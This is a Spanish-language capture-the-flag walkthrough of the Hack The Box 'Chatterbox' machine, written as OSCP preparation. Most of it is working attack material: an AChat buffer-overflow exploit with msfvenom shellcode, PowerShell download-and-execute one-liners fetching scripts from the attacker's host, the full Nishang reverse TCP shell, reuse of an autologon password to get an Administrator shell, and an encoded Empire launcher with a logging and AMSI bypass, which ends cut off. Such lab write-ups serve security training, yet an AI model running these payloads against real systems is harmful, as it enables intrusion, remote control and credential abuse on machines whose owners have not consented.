Esta ha sido una de las boxes más complejas que he hecho. Sobretodo porque no tengo tanta experiencia en windows.

Como siempre empezamos con un Nmap

root@Kali2:~# nmap -p 9255,9256 -sC -sV 10.10.10.74
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-25 16:11 CEST
Nmap scan report for 10.10.10.74
Host is up (0.33s latency).

PORT 	STATE SERVICE VERSION
9255/tcp open  http	AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

Luego como solo hay dos puertos y el punto de entrada es Achat

root@Kali2:~# searchsploit achat
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        	|  Path
                                                                                                                                                                      	| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                                                                            	| exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                                                                               	| exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                                  	| exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                                                                                    	| exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Podemos usar MSF o manual. Como esto es preparacion para OSCP será manual.

Copiamos el exploit

searchsploit -m 36025

A partir de ahora hay q modificar el payload y el targuet.

Para el payload queremos que se conecte conmigo y baje (usando SimpleHtmlServer) una reverse shell de nishang. Obviamente tienes que ajustar esa shell y usar un listener.

root@Kali2:~/Desktop# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/powershellreverse.ps1')\"" -e x86/unicode_mixed -b msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://<LABIP>/writeup.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 670 (iteration=0)
x86/unicode_mixed chosen with final size 670
Payload size: 670 bytes
Final size of python file: 3210 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x77\x78\x75\x32"
buf += "\x69\x70\x39\x70\x39\x70\x53\x30\x64\x49\x47\x75\x6c"
buf += "\x71\x67\x50\x43\x34\x64\x4b\x70\x50\x70\x30\x42\x6b"
buf += "\x70\x52\x7a\x6c\x54\x4b\x71\x42\x6d\x44\x62\x6b\x72"
buf += "\x52\x4c\x68\x6c\x4f\x75\x67\x4f\x5a\x4f\x36\x6c\x71"
buf += "\x39\x6f\x76\x4c\x4d\x6c\x63\x31\x51\x6c\x79\x72\x4e"
buf += "\x4c\x6f\x30\x55\x71\x66\x6f\x5a\x6d\x39\x71\x48\x47"
buf += "\x48\x62\x5a\x52\x4f\x62\x50\x57\x42\x6b\x72\x32\x5a"
buf += "\x70\x44\x4b\x30\x4a\x4f\x4c\x34\x4b\x30\x4c\x4b\x61"
buf += "\x31\x68\x37\x73\x4e\x68\x4a\x61\x56\x71\x30\x51\x32"
buf += "\x6b\x4f\x69\x4f\x30\x5a\x61\x38\x53\x54\x4b\x6f\x59"
buf += "\x4c\x58\x69\x53\x4e\x5a\x30\x49\x54\x4b\x6e\x54\x34"
buf += "\x4b\x6a\x61\x66\x76\x4d\x61\x49\x6f\x36\x4c\x66\x61"
buf += "\x66\x6f\x4c\x4d\x69\x71\x75\x77\x6f\x48\x67\x70\x63"
buf += "\x45\x6c\x36\x39\x73\x73\x4d\x69\x68\x4f\x4b\x43\x4d"
buf += "\x4c\x64\x30\x75\x69\x54\x71\x48\x74\x4b\x70\x58\x6d"
buf += "\x54\x79\x71\x56\x73\x43\x36\x54\x4b\x4a\x6c\x4e\x6b"
buf += "\x62\x6b\x32\x38\x6d\x4c\x6b\x51\x76\x73\x72\x6b\x6d"
buf += "\x34\x44\x4b\x4b\x51\x56\x70\x71\x79\x4d\x74\x6c\x64"
buf += "\x6c\x64\x51\x4b\x61\x4b\x71\x51\x70\x59\x6e\x7a\x50"
buf += "\x51\x4b\x4f\x47\x70\x31\x4f\x31\x4f\x4f\x6a\x74\x4b"
buf += "\x5a\x72\x38\x6b\x62\x6d\x31\x4d\x71\x5a\x4d\x31\x34"
buf += "\x4d\x53\x55\x68\x32\x39\x70\x79\x70\x39\x70\x42\x30"
buf += "\x62\x48\x6e\x51\x72\x6b\x72\x4f\x32\x67\x49\x6f\x37"
buf += "\x65\x75\x6b\x6a\x50\x65\x65\x66\x42\x31\x46\x70\x68"
buf += "\x43\x76\x62\x75\x75\x6d\x55\x4d\x59\x6f\x76\x75\x6d"
buf += "\x6c\x4c\x46\x51\x6c\x6b\x5a\x45\x30\x39\x6b\x57\x70"
buf += "\x63\x45\x69\x75\x75\x6b\x71\x37\x4e\x33\x64\x32\x50"
buf += "\x6f\x52\x4a\x69\x70\x42\x33\x4b\x4f\x7a\x35\x54\x30"
buf += "\x52\x4f\x73\x47\x33\x35\x30\x72\x51\x63\x31\x58\x4f"
buf += "\x75\x50\x6c\x30\x6c\x4b\x70\x4f\x32\x30\x49\x50\x45"
buf += "\x72\x38\x4f\x38\x70\x4e\x42\x45\x52\x57\x6e\x4d\x30"
buf += "\x4f\x62\x42\x70\x6a\x63\x35\x72\x43\x74\x34\x6f\x30"
buf += "\x50\x4e\x51\x55\x32\x54\x6c\x6e\x30\x57\x30\x65\x70"
buf += "\x62\x4f\x53\x30\x6c\x43\x39\x72\x45\x72\x4e\x30\x74"
buf += "\x4d\x59\x4c\x6e\x61\x54\x62\x4f\x31\x67\x50\x6e\x70"
buf += "\x6c\x72\x4f\x33\x31\x62\x44\x72\x33\x44\x34\x54\x32"
buf += "\x53\x39\x32\x4e\x43\x37\x4f\x38\x4b\x77\x6f\x78\x73"
buf += "\x44\x33\x44\x34\x30\x6f\x4a\x6c\x6f\x4c\x6f\x6f\x4c"
buf += "\x30\x4c\x6f\x51\x70\x42\x61\x39\x30\x50\x4d\x6e\x4c"
buf += "\x6f\x44\x37\x34\x32\x33\x39\x61\x64\x4f\x75\x53\x45"
buf += "\x62\x50\x6c\x6e\x54\x30\x30\x73\x70\x31\x4b\x77\x6d"
buf += "\x59\x4d\x52\x6d\x30\x41\x41"

Esto lo pegamos en el exploit.

Para la shell hay que agregar la última linea al github.

function Invoke-PowerShellTcp 
{ 
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. 

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. 
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 
the given IP and port. 

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. 

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port. 

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>      
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind

    )

    
    try 
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 1234

Ejecutamos el exploit

root@Kali2:~/Desktop# python 36025.py
---->{P00F}!

Y tenemos nuestro usuario

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.74] 49167
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\alfred

Corremos all checks

PS C:\Windows\system32> IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/PowerUpAllchecks.ps1')

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


[*] Checking service permissions...


[*] Checking %PATH% for potentially hijackable DLL locations...


[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


DefaultDomainName	:
DefaultUserName  	: Alfred
DefaultPassword  	: Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :

Intentaremos reutilizar credenciales, para eso checamos los usuarios

PS C:\Windows\system32> net users

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator        	Alfred               	Guest               	 
The command completed successfully.

Ahora llamaremos a la misma reversehll con el puerto modificado usando el Administrator

PS C:\Windows\system32> $passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS C:\Windows\system32> $creds = New-Object System.Management.Automation.PSCredential('Administrator',$passwd)
PS C:\Windows\system32> $creds

UserName                                                           	Password
--------                                                           	--------
Administrator                                  	System.Security.SecureString

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/powershellreverse2.ps1')" -Credential $creds

Y listo

root@Kali2:~/Desktop# nc -nlvp 1235
listening on [any] 1235 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.74] 49175
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\administrator
PS C:\Windows\system32>

Como alternativa podemos usar Empire. Primero Activamos el listener y obtenemos el powershell que ejecutara el agent. (bindip, port y host)

git clone  https://github.com/EmpireProject/Empire
cd setup
./install.sh
cd ..
./empire
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______	__  .______   	_______
  |   ____||   \/   | |   _  \  |  | |   _  \ 	|   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |	|  |__
  |   __|  |  |\/|  | |   ___/  |  | |  	/ 	|   __|
  |  |____ |  |  |  | |  |  	|  | |  |\  \----.|  |____
  |_______||__|  |__| | _|  	|__| | _| `._____||_______|



(Empire) > listeners
(Empire: listeners) > uselistener
dbx       	http      	http_com  	http_foreign  http_hop  	http_mapi 	meterpreter   onedrive  	redirector    
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

	Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name          	Required	Value                        	Description
  ----          	--------	-------                      	-----------
  SlackToken    	False                                    	Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds    	False   	default                      	Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate      	False                                    	Date for the listener to exit (MM/dd/yyyy).
  Name          	True    	http                         	Name for the listener.
  Launcher      	True    	powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay  	True    	5                            	Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True    	60                           	Number of missed checkins before exiting
  WorkingHours  	False                                    	Hours for the agent to operate (09:00-17:00).
  SlackChannel  	False   	#general                     	The Slack channel or DM that notifications will be sent to.
  DefaultProfile	True    	/admin/get.php,/news.php,/login/ Default communication profile for the agent.
                            	process.php|Mozilla/5.0 (Windows
                            	NT 6.1; WOW64; Trident/7.0;
                            	rv:11.0) like Gecko
  Host          	True    	http://10.10.14.26:443       	Hostname/IP for staging.
  CertPath      	False                                    	Certificate path for https listeners.
  DefaultJitter 	True    	0.0                          	Jitter in agent reachback interval (0.0-1.0).
  Proxy         	False   	default                      	Proxy to use for request (default, none, or other).
  UserAgent     	False   	default                      	User-agent string to use for the staging request (default, none, or other).
  StagingKey    	True    	>yn+5G)k*%.8-b4BFZCS;~3c9,aX(wf< Staging key for initial agent negotiation.
  BindIP        	True    	10.10.14.26                  	The IP to bind to on the control server.
  Port          	True    	443                          	Port for the listener.
  ServerVersion 	True    	Microsoft-IIS/7.5            	Server header for the control server.
  StagerURI     	False                                    	URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) >
agents 	back   	creds  	execute	exit   	help   	info   	launcher   listeners  main   	resource   set    	unset 	 
(Empire: listeners/http) > launcher
[!] Please enter 'launcher <language>'
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAG8ATABsAEUAQwBUAEkAbwBOAHMALgBHAGUAbgBlAHIAaQBjAC4ARABpAEMAdABJAE8AbgBBAFIAeQBbAFMAVAByAEkATgBnACwAUwB5AFMAdABlAE0ALgBPAEIASgBlAGMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAQwByAEkAUABUAEIAbABvAGMASwBdAC4AIgBHAGUAVABGAGkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAEwAdQBlACgAJABuAFUATABsACwAKABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAQwBvAGwATABFAGMAVABpAE8AbgBzAC4ARwBlAE4AZQBSAGkAYwAuAEgAQQBTAEgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwALAAkAHQAcgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFMAZQBSAFYASQBjAEUAUABPAEkATgB0AE0AQQBuAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AdABJAG4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBTAHQARQBNAC4ATgBlAHQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgAZQBhAEQAZQByAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAeQA9AFsAUwB5AHMAVABFAE0ALgBOAEUAdAAuAFcAZQBCAFIARQBxAFUAZQBTAHQAXQA6ADoARABlAGYAQQB1AGwAVABXAGUAQgBQAFIAbwB4AHkAOwAkAFcAYwAuAFAAcgBvAHgAWQAuAEMAcgBlAGQARQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBDAHIARQBEAGUAbgBUAGkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAFUAbABUAE4ARQB0AHcAbwBSAEsAQwByAEUAZABlAG4AVABJAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABlAE0ALgBUAGUAeAB0AC4ARQBuAEMAbwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AEUAUwAoACcAPgB5AG4AKwA1AEcAKQBrACoAJQAuADgALQBiADQAQgBGAFoAQwBTADsAfgAzAGMAOQAsAGEAWAAoAHcAZgA8ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA2ADoANAA0ADMAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBDAC4ASABFAEEAZABlAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ALwA4AHIAawBUAGUAbABBAEgAUABNAGcATwBWAHYAeABiADcAYgB2ADUAVQBlAHEATwBXAFkAPQAiACkAOwAkAEQAYQB0AGEAPQAkAFcAQwAuAEQAbwB3AG4AbABPAEEARABEAEEAdABBACgAJABTAEUAcgArACQAVAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAFQAaABdADsALQBKAG8AaQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
(Empire: listeners/http) >

Copiamos todo el y lo usaremos en vez de nuestra reverse shell.

powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAG8ATABsAEUAQwBUAEkAbwBOAHMALgBHAGUAbgBlAHIAaQBjAC4ARABpAEMAdABJAE8AbgBBAFIAeQBbAFMAVAByAEkATgBnACwAUwB5AFMAdABlAE0ALgBPAEIASgBlAGMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAQwByAEkAUABUAEIAbABvAGMASwBdAC4AIgBHAGUAVABGAGkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAEwAdQBlACgAJABuAFUATABsACwAKABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAQwBvAGwATABFAGMAVABpAE8AbgBzAC4ARwBlAE4AZQBSAGkAYwAuAEgAQQBTAEgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQ